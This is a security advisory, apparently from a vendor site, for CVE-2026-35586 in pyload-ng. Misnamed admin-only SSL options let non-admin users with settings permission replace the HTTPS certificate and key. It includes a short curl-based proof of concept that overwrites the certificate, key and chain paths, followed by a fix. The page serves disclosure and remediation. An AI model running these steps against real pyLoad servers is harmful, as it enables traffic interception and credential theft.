CVE-2026-35586

CVE-2026-35586 is a medium-severity incorrect authorization vulnerability in pyload-ng (pip), affecting versions < 0.5.0b3.dev97. It is fixed in 0.5.0b3.dev97.

Summary

The ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all.

Details

The vulnerability is in src/pyload/core/api/__init__.py. The ADMIN_ONLY_CORE_OPTIONS set is defined at lines 237-248:

ADMIN_ONLY_CORE_OPTIONS = {
    ("general", "storage_folder"),
    ("log", "syslog_host"),
    ("log", "syslog_port"),
    ("proxy", "password"),
    ("proxy", "username"),
    ("reconnect", "script"),
    ("webui", "host"),
    ("webui", "ssl_cert"),      # BUG: should be "ssl_certfile"
    ("webui", "ssl_key"),       # BUG: should be "ssl_keyfile"
    ("webui", "use_ssl"),
}
# NOTE: ("webui", "ssl_certchain") is entirely missing

The actual config option names are defined in src/pyload/core/config/default.cfg:39-41:

file ssl_certfile : "SSL Certificate" = ssl.crt
file ssl_keyfile : "SSL Key" = ssl.key
file ssl_certchain : "CA's intermediate certificate bundle (optional)" =

The authorization check at line 267 compares the incoming (category, option) tuple against this set:

if (category, option) in ADMIN_ONLY_CORE_OPTIONS and not is_admin:
    self.pyload.log.error(...)
    return

When a request arrives with option=ssl_certfile, the check evaluates ("webui", "ssl_certfile") in ADMIN_ONLY_CORE_OPTIONS which is False because the set contains ("webui", "ssl_cert"), not ("webui", "ssl_certfile"). The admin-only guard is bypassed and config.set() at line 271 proceeds to write the attacker-supplied value.

The value is cast as a file type in parser.py:300-305, which resolves it via os.path.realpath() but performs no further validation:

elif typ in ("file", "folder"):
    return (
        ""
        if value in (None, "")
        else os.path.realpath(os.path.expanduser(os.fsdecode(value)))
    )

On server restart with SSL enabled, the webserver loads the attacker-controlled paths (webserver_thread.py:22-23,51-52):

self.certfile = self.pyload.config.get("webui", "ssl_certfile")
self.keyfile = self.pyload.config.get("webui", "ssl_keyfile")
# ...
self.server.ssl_adapter = BuiltinSSLAdapter(
    self.certfile, self.keyfile, self.certchain
)

PoC

Prerequisites: A pyLoad instance with SSL enabled and a non-admin user account that has SETTINGS permission.

Step 1: Authenticate as the non-admin user to get a session cookie:

curl -c cookies.txt -X POST 'http://localhost:8000/login' \
  -d 'username=settingsuser&password=password123'

Step 2: Set the SSL certificate to an attacker-controlled file path:

curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_certfile": "/tmp/attacker.crt"}}'

Expected response: true (config saved successfully)

Step 3: Set the SSL key to an attacker-controlled file path:

curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_keyfile": "/tmp/attacker.key"}}'

Expected response: true (config saved successfully)

Step 4: Set the SSL certificate chain (never protected):

curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_certchain": "/tmp/attacker-chain.crt"}}'

Expected response: true (config saved successfully)

Step 5: After the server restarts, it will load the attacker's certificate and key for all HTTPS connections.

Impact

A non-admin user with SETTINGS permission can replace the SSL certificate and key used by the pyLoad HTTPS server. When the server restarts (or is restarted by an admin), it will serve HTTPS using the attacker's certificate/key pair. This enables:

  • Man-in-the-Middle attacks: The attacker, possessing the private key for the now-active certificate, can intercept and decrypt all HTTPS traffic to the pyLoad instance, including admin credentials and session tokens.
  • Credential theft: All users (including admins) connecting over HTTPS will have their credentials exposed to the attacker.
  • Configuration tampering: With intercepted admin credentials, the attacker can escalate to full admin access.

The attack requires SSL to already be enabled by an admin (the use_ssl option is correctly protected), the attacker to place certificate/key files on the filesystem (potentially achievable via pyLoad's download functionality), and a server restart.

The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.

CVE-2026-35586 has a CVSS score of 6.8 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.5.0b3.dev97); upgrading removes the vulnerable code path.

Affected versions

pyload-ng (< 0.5.0b3.dev97)

Security releases

pyload-ng → 0.5.0b3.dev97 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Fix the option names in ADMIN_ONLY_CORE_OPTIONS and add the missing ssl_certchain option in src/pyload/core/api/__init__.py:

ADMIN_ONLY_CORE_OPTIONS = {
    ("general", "storage_folder"),
    ("log", "syslog_host"),
    ("log", "syslog_port"),
    ("proxy", "password"),
    ("proxy", "username"),
    ("reconnect", "script"),
    ("webui", "host"),
    ("webui", "ssl_certfile"),    # Fixed: was "ssl_cert"
    ("webui", "ssl_keyfile"),     # Fixed: was "ssl_key"
    ("webui", "ssl_certchain"),   # Added: was missing entirely
    ("webui", "use_ssl"),
}

Frequently Asked Questions

  1. What is CVE-2026-35586? CVE-2026-35586 is a medium-severity incorrect authorization vulnerability in pyload-ng (pip), affecting versions < 0.5.0b3.dev97. It is fixed in 0.5.0b3.dev97. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
  2. How severe is CVE-2026-35586? CVE-2026-35586 has a CVSS score of 6.8 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of pyload-ng are affected by CVE-2026-35586? pyload-ng (pip) versions < 0.5.0b3.dev97 is affected.
  4. Is there a fix for CVE-2026-35586? Yes. CVE-2026-35586 is fixed in 0.5.0b3.dev97. Upgrade to this version or later.
  5. Is CVE-2026-35586 exploitable, and should I be worried? Whether CVE-2026-35586 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-35586 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-35586? Upgrade pyload-ng to 0.5.0b3.dev97 or later.

Other vulnerabilities in pyload-ng

CVE-2026-46561CVE-2026-45348CVE-2026-45306CVE-2026-44226CVE-2026-42315

Stop the waste.
Protect your environment with Kodem.